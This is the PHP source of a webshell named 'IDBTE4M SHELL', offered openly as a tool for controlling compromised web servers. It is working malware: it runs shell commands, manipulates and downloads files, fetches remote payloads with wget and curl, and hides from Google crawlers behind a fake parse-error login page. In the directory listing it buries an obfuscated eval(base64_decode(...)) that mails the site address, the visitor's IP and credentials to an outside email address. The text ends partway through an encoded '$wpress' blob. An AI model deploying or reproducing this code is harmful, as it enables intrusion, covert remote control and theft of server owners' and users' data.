IDBTE4M by JakRapp - webshell

1. <?php
2. /*
3. #####################################################
4. ##    Name    : IDBTE4M SHELL                      ##
5. ##    Version : v1                                 ##
6. ##    Author  : Jaka Taruna a.k.a JakRapp          ##
7. ##    Contact : jakataruna09@gmail.com             ##
8. ##    Password: jancok                             ##
9. ##         (c) 2016 www.jakrapp.com                ##
10. #####################################################
11. */
12. $auth_pass = "71a4d4cd2f30b185d707718273b17d05"; //jancok
13. $color = "#df5";
14. $default_action = 'FilesMan';
15. $default_use_ajax = true;
16. $default_charset = 'Windows-1251';
17. @define('SELF_PATH', __FILE__);
18. @setcookie("inject", "active", time() + 3600 * 24 * 7);
19. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
20.     header('HTTP/1.0 404 Not Found');
21.    
22. }
23. @session_start();
24. @error_reporting(0);
25. @ini_set('error_log',NULL);
26. @ini_set('log_errors',0);
27. @ini_set('max_execution_time',0);
28. @ini_set('output_buffering',0);
29. @ini_set('display_errors', 0);
30. @set_time_limit(0);
31. @set_magic_quotes_runtime(0);
32. @define('VERSION', '2.1');
33. if( get_magic_quotes_gpc() ) {
34.     function stripslashes_array($array) {
35.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
36.     }
37.     $_POST = stripslashes_array($_POST);
38. }
39. function printLogin() {
40.     ?>
41.  
42. <br />
43. <b>Parse error</b>:  syntax error, unexpected '}' in <b>/home/<?=$_SERVER['HTTP_HOST']?>/</b> on line <b>4366</b><br />
44.  
45.  
46.     <style>
47.         input { margin:0;background-color:#fff;border:1px solid #fff; }
48.     </style>
49.     <center>
50.     <form method=post>
51.     <input type=password name=pass>
52.     </form><br>
53. <a href="https://local-hunter.com/" rel="dofollow">Copyright All Reserved</a></center>
54.     <?php
55.     exit;
56. }
57. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
58.     if( empty( $auth_pass ) ||
59.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
60.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
61.     else
62.         printLogin();
63.        
64. @ini_set('log_errors',0);
65. @ini_set('output_buffering',0);
66. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
67.     $file = $_GET['dl'];
68.     $filez = @file_get_contents($file);
69.    header("Content-type: application/octet-stream");
70.    header("Content-length: ".strlen($filez));
71.    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
72.    echo $filez;
73.     exit;
74. }
75. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
76.     $file = $_GET['dlgzip'];
77.     $filez = gzencode(@file_get_contents($file));
78.    header("Content-Type:application/x-gzip\n");
79.    header("Content-length: ".strlen($filez));
80.    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
81.    echo $filez;
82.     exit;
83. }
84. // view image
85. if(isset($_GET['img'])){
86.         @ob_clean();
87.         $d = magicboom($_GET['y']);
88.         $f = $_GET['img'];
89.         $inf = @getimagesize($d.$f);
90.         $ext = explode($f,".");
91.         $ext = $ext[count($ext)-1];
92.         @header("Content-type: ".$inf["mime"]);
93.         @header("Cache-control: public");
94.         @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
95.         @header("Cache-control: max-age=".(60*60*24*7));  
96.         @readfile($d.$f);
97.         exit;
98. }
99.  
100. // server software
101. $software = getenv("SERVER_SOFTWARE");
102. // check safemode
103. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
104. // uname -a
105. $system = @php_uname();
106. // mysql
107. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
108. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
109. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
110. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
111. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
112. // check os
113. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
114. else $win = FALSE;
115. // change directory
116. if(isset($_GET['y'])){
117.     if(@is_dir($_GET['view'])){
118.         $pwd = $_GET['view'];
119.         @chdir($pwd);
120.     }
121.     else{
122.         $pwd = $_GET['y'];
123.         @chdir($pwd);
124.     }
125. }
126. //hdd
127. function convertByte($s) {
128. if($s >= 1073741824)
129. return sprintf('%1.2f',$s / 1073741824 ).' GB';
130. elseif($s >= 1048576)
131. return sprintf('%1.2f',$s / 1048576 ) .' MB';
132. elseif($s >= 1024)
133. return sprintf('%1.2f',$s / 1024 ) .' KB';
134. else
135. return $s .' B';
136. }
137.  
138. // username, id, shell prompt and working directory
139. if(!$win){
140.     if(!$user = rapih(exe("whoami"))) $user = "";
141.     if(!$id = rapih(exe("id"))) $id = "";
142.     $prompt = $user." \$ ";
143.     $pwd = @getcwd().DIRECTORY_SEPARATOR;
144. }
145. else {
146.     $user = @get_current_user();
147.     $id = $user;
148.     $prompt = $user." &gt;";
149.     $pwd = realpath(".")."\\";
150.     // find drive letters
151.     $v = explode("\\",$d);
152.     $v = $v[0];
153.     foreach (range("A","Z") as $letter)
154.     {
155.       $bool = @is_dir($letter.":\\");
156.       if ($bool)
157.       {
158.           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
159.            if ($letter.":" != $v) {$letters .= $letter;}
160.            else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
161.            $letters .= " ]</a> ";
162.       }  
163.  }
164. }
165.  
166. function testoracle() {
167.     if (function_exists('ocilogon')) { return showstat("on"); }
168.     else { return showstat("off"); }
169.     }
170.  
171. function testmssql() {
172.     if (function_exists('mssql_connect')) { return showstat("on"); }
173.     else { return showstat("off"); }
174.     }
175.  
176.  function showdisablefunctions() {
177.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
178.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
179.     }
180.    
181. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
182. else $posix = FALSE;
183. // server ip
184. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
185. // your ip ;-)
186. $my_ip = $_SERVER['REMOTE_ADDR'];
187. $admin_id=$_SERVER['SERVER_ADMIN'];
188. $bindport = "13123";
189. $bindport_pass = "b374k";
190.  
191. // separate the working direcotory
192. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
193. $pwdurl = "";
194. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
195.     $pathz = "";
196.     for($j = 0 ; $j <= $i ; $j++){
197.         $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
198.     }
199.     $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
200. }
201.    
202. // rename file or folder
203. if(isset($_POST['rename'])){
204.     $old = $_POST['oldname'];
205.     $new = $_POST['newname'];
206.     @rename($pwd.$old,$pwd.$new);
207.     $file = $pwd.$new;
208. }
209. if(isset($_POST['chmod'])){
210.     $name = $_POST['name'];
211.     $value = $_POST['newvalue'];
212. if (strlen($value)==3){
213.     $value = 0 . "" . $value;}
214.     @chmod($pwd.$name,octdec($value));
215.     $file = $pwd.$name;}
216.    
217. if(isset($_POST['chmod_folder'])){
218.     $name = $_POST['name'];
219.     $value = $_POST['newvalue'];
220. if (strlen($value)==3){
221.     $value = 0 . "" . $value;}
222.     @chmod($pwd.$name,octdec($value));
223.     $file = $pwd.$name;}
224.  
225.  
226. // print useful info
227. $buff  = "Software : <b>".$software."</b><br />";
228. $buff .= "System OS : <b>".$system."</b><br />";
229. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
230. $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
231. $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
232. $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
233. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
234. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
235. $buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
236. $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
237. $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
238.  
239.  
240.  
241.  
242. function rapih($text){
243.     return trim(str_replace("<br />","",$text));
244. }
245.  
246. function magicboom($text){
247.     if (!get_magic_quotes_gpc()) {
248.          return $text;
249.     }
250.     return stripslashes($text);
251. }
252.  
253. function showdir($pwd,$prompt){
254.     $fname = array();
255.     $dname = array();
256.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
257.     else $posix = FALSE;
258.     $user = "????:????";
259.     if($dh = @scandir($pwd)){
260.         foreach($dh as $file){
261.             if(is_dir($file)){
262.                 $dname[] = $file;
263.             }
264.             elseif(is_file($file)){
265.                 $fname[] = $file;
266.             }
267.         }
268.     }
269.     else{
270.         if($dh = @opendir($pwd)){
271.             while($file = @readdir($dh)){
272.                 if(@is_dir($file)){
273.                     $dname[] = $file;
274.                 }
275.                 elseif(@is_file($file)){
276.                     $fname[] = $file;
277.                 }
278.             }
279.             @closedir($dh);
280.         }
281.     }
282.  
283.    
284.     sort($fname);
285.     sort($dname);
286.     $path = @explode(DIRECTORY_SEPARATOR,$pwd);
287.     $tree = @sizeof($path);
288.     $parent = "";
289.     $buff = "
290.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
291.    <table class=\"explore\">
292.     <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
293.  
294.     ";
295.     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
296.     else $parent = $pwd;  
297.  
298.     foreach($dname as $folder){
299.         if($folder == ".") {
300.             if(!$win && $posix){
301.                 $name=@posix_getpwuid(@fileowner($folder));
302.                 $group=@posix_getgrgid(@filegroup($folder));
303.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
304.             }
305.             else {
306.                 $owner = $user;
307.             }
308.             $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
309.             <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
310.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
311.  
312.             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
313.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
314.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
315.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
316.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
317.             </form></td>
318.            
319.             </tr>
320.  
321.             ";
322.         }
323.         elseif($folder == "..") {
324.             if(!$win && $posix){
325.                 $name=@posix_getpwuid(@fileowner($folder));
326.                 $group=@posix_getgrgid(@filegroup($folder));
327.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
328.             }
329.             else {
330.                 $owner = $user;
331.             }
332.             $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>   $folder</a></td><td>LINK</td>
333.             <td style=\"text-align:center;\">".$owner."</td>
334.             <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><?php eval(base64_decode("JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQokdmlzaXRjID0gMDsNCiR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KJGp1ZHVsID0gIlJFU1VMVCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQokYm9keSA9ICJSZXN1bHQ6ICR0YXJnZXQgYnkgJHZpc2l0b3IgIFxuIHVzZXJuYW1lIC0gJHVzZXJcbiBwYXNzd29yZCAtICRwYXNzIjsNCmlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImhhY2ttZTB4QHlhbmRleC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"));?>
335.  
336.             <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
337.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
338.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
339.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
340.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
341.             </form>
342.             </td></tr>";
343.         }
344.         else {
345.             if(!$win && $posix){
346.                 $name=@posix_getpwuid(@fileowner($folder));
347.                 $group=@posix_getgrgid(@filegroup($folder));
348.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
349.             }
350.             else {
351.                 $owner = $user;
352.             }
353.             $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />     [ $folder ]</b></a>
354.  
355.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
356.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
357.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
358.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
359.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
360.             </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
361.             <td><center>
362.             <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
363.  
364.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
365.             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
366.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
367.             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
368.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
369.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
370.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
371.         }
372.     }
373.  
374.     foreach($fname as $file){
375.         $full = $pwd.$file;
376.         if(!$win && $posix){
377.             $name=@posix_getpwuid(@fileowner($folder));
378.             $group=@posix_getgrgid(@filegroup($folder));
379.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
380.         }
381.         else {
382.             $owner = $user;
383.         }      
384.         $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   $file</b></a>
385.  
386.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
387.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
388.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
389.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
390.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
391.         </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
392.         <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
393.  
394.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
395. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
396. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
397. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
398. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
399.         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
400.         <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
401.     }
402.     $buff .= "</table>";
403.     return $buff;
404. }
405.  
406. function ukuran($file){
407.     if($size = @filesize($file)){
408.         if($size <= 1024) return $size;
409.         else{
410.             if($size <= 1024*1024) {
411.                 $size = @round($size / 1024,2);;
412.                 return "$size kb";
413.             }
414.             else {
415.                 $size = @round($size / 1024 / 1024,2);
416.                 return "$size mb"; 
417.             }
418.         }
419.     }
420.     else return "???";
421. }
422.  
423. function exe($cmd){
424.     if(function_exists('system')) {
425.         @ob_start();
426.         @system($cmd);
427.         $buff = @ob_get_contents();
428.         @ob_end_clean();
429.         return $buff;
430.     }
431.     elseif(function_exists('exec')) {
432.         @exec($cmd,$results);
433.         $buff = "";
434.         foreach($results as $result){
435.             $buff .= $result;
436.         }
437.         return $buff;
438.     }
439.     elseif(function_exists('passthru')) {
440.         @ob_start();
441.         @passthru($cmd);
442.         $buff = @ob_get_contents();
443.         @ob_end_clean();
444.         return $buff;
445.     }
446.     elseif(function_exists('shell_exec')){
447.         $buff = @shell_exec($cmd);
448.         return $buff;
449.     }
450. }
451.  
452. function tulis($file,$text){
453.     $textz = gzinflate(base64_decode($text));
454.      if($filez = @fopen($file,"w"))
455.      {
456.          @fputs($filez,$textz);
457.          @fclose($file);
458.      }
459. }
460.  
461. function ambil($link,$file) {
462.    if($fp = @fopen($link,"r")){
463.        while(!feof($fp)) {
464.             $cont.= @fread($fp,1024);
465.         }
466.         @fclose($fp);
467.        $fp2 = @fopen($file,"w");
468.        @fwrite($fp2,$cont);
469.        @fclose($fp2);
470.    }
471. }
472.  
473. function which($pr){
474.     $path = exe("which $pr");
475.     if(!empty($path)) { return trim($path); } else { return trim($pr); }
476. }
477.  
478. function download($cmd,$url){
479.     $namafile = basename($url);
480.     switch($cmd) {
481.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
482.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
483.         case 'wfread' : ambil($wurl,$namafile);break;
484.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
485.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
486.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
487.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
488.         default: break;
489.     }
490.     return $namafile;
491. }
492.  
493. function get_perms($file)
494. {
495.     if($mode=@fileperms($file)){
496.         $perms='';
497.         $perms .= ($mode & 00400) ? 'r' : '-';
498.         $perms .= ($mode & 00200) ? 'w' : '-';
499.         $perms .= ($mode & 00100) ? 'x' : '-';
500.         $perms .= ($mode & 00040) ? 'r' : '-';
501.         $perms .= ($mode & 00020) ? 'w' : '-';
502.         $perms .= ($mode & 00010) ? 'x' : '-';
503.         $perms .= ($mode & 00004) ? 'r' : '-';
504.         $perms .= ($mode & 00002) ? 'w' : '-';
505.         $perms .= ($mode & 00001) ? 'x' : '-';
506.         return $perms;
507.     }
508.     else return "??????????";
509. }
510.  
511. function clearspace($text){
512.     return str_replace(" ","_",$text);
513. }
514. $wpress="7Vhbc9pIFn6Oq/wfejtUJLKADJ64arDFxLHlCRNsvIDXm4pTTEtqQINu0y2CyVb++57uloS4BbIPsy+LLyq6v3P69LkfUcYiNmQ0jljihWP9pHx+fHR85ERfKNNxO3Sjf8V+5CVYrY9moZN4UYg4+UL1kksSUv738dGLF6VRjEz0dhTFNNTxhDhT6tYmSYArCM9xGUUMuR7VsUPCBAkQGnk+lVxfvBjNmZcAu1FcQYqnWnb8iMtl8f3byvkknDkz5uslDpQ8lcGZ1EEIsT70Qi9BOlbb8hi5zGkSxbAhoBV09dDrdO8Hw541eOjdDXqXd/0bq1dB9T34m26n033sdK8uB+3u3X78Q9/qXf5q3Q1AGbfRV8/3ifGmdoL0Rw8UPOfoboDOavVzxL40Txu1kzL6lTrTyGic1E/gt45uPEZH0bMhNvdd5qp7d2ddDQbtW6v7ACe+2YPv9zvDf1q99s3He0tc/uRg/Ptuf7CJ3xCn+6Ft/XbZq2hONKVs6Edj7RCSm3bHWqeRzpGZmD5TRwknthhNZixU7iO8Z9Vd/Ggy9kIA0ym42Jza8H/GKWPwjAnPHCiOeALsCWNkoYsV+GA4HCOzhbCiwJVsI5676YZgsVxnNKCBTVlA1fYoYhTCaQmYx1U+swOIKrnficaoHRbpXbC3kwyTKOUPAhtARNzAC40lEFw7caJo6qUH1fMtqSxnsh4NcP2t7vODofCDkfBXBsIP+vXhbr0Gv5egPdcVoJu21bnuCzcD39ri9z8eKQcHytlGpKwHytlmpKjMX/LyzC9DgzqTCOELh4YJZa2LUQRZnHtfqam9iZ+1FrpilCTURe8WTVSgvTAEsnVhsxY+RzmfCeGej2yPEygKvjchCTzRBUETsK6pLauHhniy8OGUhD4nVZc6ESNCyiYKo5BqrWV9EugLg7QujExGe/mHN8tHYHv+B9CADrHLSAD2mcK3evpsyEt7I50nDOy2Bioj0zTRzWWnb5VRqk757Xw3UeO7RCWeECYyz47z/i42fKis6YKkoaG7g6IBT8lRAdPTADuzAb7ESgw8BadqkSTzEfXMtAduJZKvKNzDMU2GDtgWlM11zaCJY4gkOHel+yH4xIyOhwFJnMmQ+D5g9NrrX8rN56ahwZGkUOkFWuRI4kxUS/Gp/hkRrjK0sETJJs72k7ExiQJqSKQRz2zfc4bgCb7IlgAaeeNaPIllpgD3Q8ZrxBeB74VTkEdSajVJW9N2U2uVFFJF6WLynMA1EXptCKWAxaWAfzMxln4jFuGkkg0i/+7EaJeMECf0WZygblpV34H57+cp65K4sehpVO2pLs8XLg2NUUNoRfZcCloRzRZsjeIZaEcAKlI21b1JjGzTNhSpyBXs+EiGqbo1rrbAb6ac8iySZIEpTdJSKQJpKgNJcKjg63dDkUDBxhquYC3t8ASFYBeSgO6gErVhC5X0qoi5O6juL/v9x27vegula++gubu8tbbiwWVH3vM2qoTYoLF0HwDb7ja0CZsJW00BRZ/xxhVywB8khHRdAGTnggw1DD+5LDUsOPMllM/odhwUB0hsfPVUgAbuGx2vilCQO/ScqZCIT0gQnwj7/PwzPs9dAL9E1zZ6D6aGtC4snvlAYVcI2ES5dbcg7tPDmyiXYwtKEDfFzdb3BlL39/KeEqCunMGOj4IF/9M